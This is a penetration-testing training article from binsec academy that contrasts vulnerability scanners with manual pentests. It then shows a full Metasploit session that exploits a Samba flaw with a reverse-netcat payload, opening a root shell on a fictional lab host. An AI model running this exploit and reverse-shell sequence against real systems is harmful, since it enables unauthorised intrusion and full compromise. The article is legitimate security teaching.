Hacking VI: Vulnerability scanner and penetration testing frameworks

binsec academy GmbH Pentest Training Hacking

It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, for example, that find web applications within a network. Another but more complex version of this example are vulnerability scanners, which automatically search for vulnerabilities in an IT system. Identifying vulnerabilities is not only the main task of a vulnerability scanner, but also our job as a penetration tester. The question then is whether a vulnerability scan can be compared to a penetration test and if not, how they differ from each other.

Vulnerability scans must be configured and started by a user. After that, a vulnerability scanner will automatically search for weak points. A penetration test, on the other hand, involves manual test phases, which naturally will take much longer. Also, vulnerability scanners can only identify known vulnerabilities, as they must be listed within the software. In addition, a pentester could search for new “unknown“ vulnerabilities or creatively combine multiple conditions to compromise an IT system. For example, a web server could access the files of an FTP server, only requiring an attacker to have FTP access in order to execute a command via PHP.

We identified another difference between vulnerability scanners and pentesters with regards to exploiting vulnerabilities. At the request of the client, pentesters will exploit vulnerabilities to figure out how deep an attacker would have been able to penetrate into the target system. A vulnerability scanner, on the other hand, can show false positives during vulnerability scans. This means that any auto-identified vulnerability must be manually verified.

Thus, a penetration test can include a vulnerability scan, but will actually do much more than that. It should be noted here that tools and, in particular, vulnerability scanners should only be used if their impact on the environment under investigation can be assessed. Otherwise, we are at a loss when a client contacts us about sudden malfunctions in the production system. We should also be aware that we can be hacked ourselves when executing third-party scripts or tools. It is therefore essential to look at the source code - if possible - and to take security precautions such as using isolated systems as a working platform.

There are currently many vulnerability scanners on the market. Two of the best known are Nessus and OpenVas. Nessus of Tenable Network Security is a commercial scanner that can be used on these platforms: Windows, Linux, Unix and Mac OS X. OpenVas only exists for Linux, however, but it is available for free as OpenSource software.

In addition to the current vulnerability scanners on the market, Rapid7 has designed its own penetration testing framework: Metasploit. Metasploit essentially provides a collection of exploits that can be customised to the needs of an attacker or tester with various options. To learn how to use it, Offensive Security designed its own publicly available training course: Metasploit Unleashed (https://www.offensive-security.com/metasploit-unleashed/). The following listing shows an example of how to use Metasploit to automatically exploit a vulnerability in the file server of Dubius Payment Ltd.:

~# msfconsole 
msf > use exploit/multi/samba/usermap_script 
msf exploit(usermap_script) > set RHOST 10.247.97.48 
RHOST => 10.247.97.48 
msf exploit(usermap_script) > set RPORT 445 
RPORT => 445 
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat 
msf exploit(usermap_script) > set LHOST 10.20.1.14 
LHOST => 10.20.1.14 
msf exploit(usermap_script) > set LPORT 4444 
LPORT => 4444 
msf exploit(usermap_script) > exploit 
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Command shell session 1 opened (10.20.1.14:4444 -> 10.247.97.48:54765) 
    at Wed Nov 28 13:39.22 +0100 2017 


ip addr show 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 
    inet 127.0.0.1/8 scope host lo 
       valid_lft forever preferred_lft forever 
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever 
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 
    link/ether d6:15:2f:c4:9a:96 brd ff:ff:ff:ff:ff:ff 
    inet 10.247.97.48/24 brd 10.247.97.255 scope global eth0 
       valid_lft forever preferred_lft forever 
    inet6 fe80::d415:2fff:fec4:9a96/64 scope link 
       valid_lft forever preferred_lft forever 
hostname 
ftp01 
id 
uid=0(root) gid=0(root) groups=0(root)

Remark: The above scenario does not work in the practice lab.

If we want to compare the validity of vulnerability scans with the validity of penetration tests, we must have a clear understanding of the false negative ratio (FNR): how many vulnerabilities are not identified as such by a vulnerability scanner, even though the security gap exists? If you like, you can discover this for yourself by scanning the DMZ network of Dubius Payment with Nessus (7-day trial) or OpvenVas, for example. In your opinion, how many vulnerabilities will a vulnerability scan list? 0, 10, 25 or even more than 50?

binsec academy GmbH - Online IT Security Training with Practical Focus

binsec academy GmbH is provider of online IT security training, offering practical, lab-based courses for professionals. The academy provides hands-on training in areas such as penetration testing and secure software development. Participants gain practical experience through realistic lab environments, including simulations of company networks and applications. Courses are available in multiple programming languages and align with standards like OWASP Top 10 and PCI DSS. Upon successful completion, participants receive certifications such as the Binsec Academy Certified Pentest Professional (BACPP) and Binsec Academy Certified Secure Coding Professional (BACSCP), demonstrating their ability to identify and remediate security vulnerabilities.

Goto binsec acadmy GmbH

binsec GmbH – Experts in Penetration Testing

binsec GmbH is a German IT security company focused on professional penetration testing. With over 10 years of experience, the team conducts in-depth penetration tests on networks, web applications, APIs, and mobile apps. Certified experts systematically identify and document security vulnerabilities to support organizations in improving their security and meeting compliance requirements.

Goto binsec GmbH

Contact

binsec GmbH
Solmsstraße 41
60486 Frankfurt am Main
Germany

Legal notice

Director: Patrick Sauer
Authorized Officer: Dominik Sauer, Florian Zavatzki
Registration: Frankfurt am Main, HRB97277
Turnover Tax Identification No.: DE290966808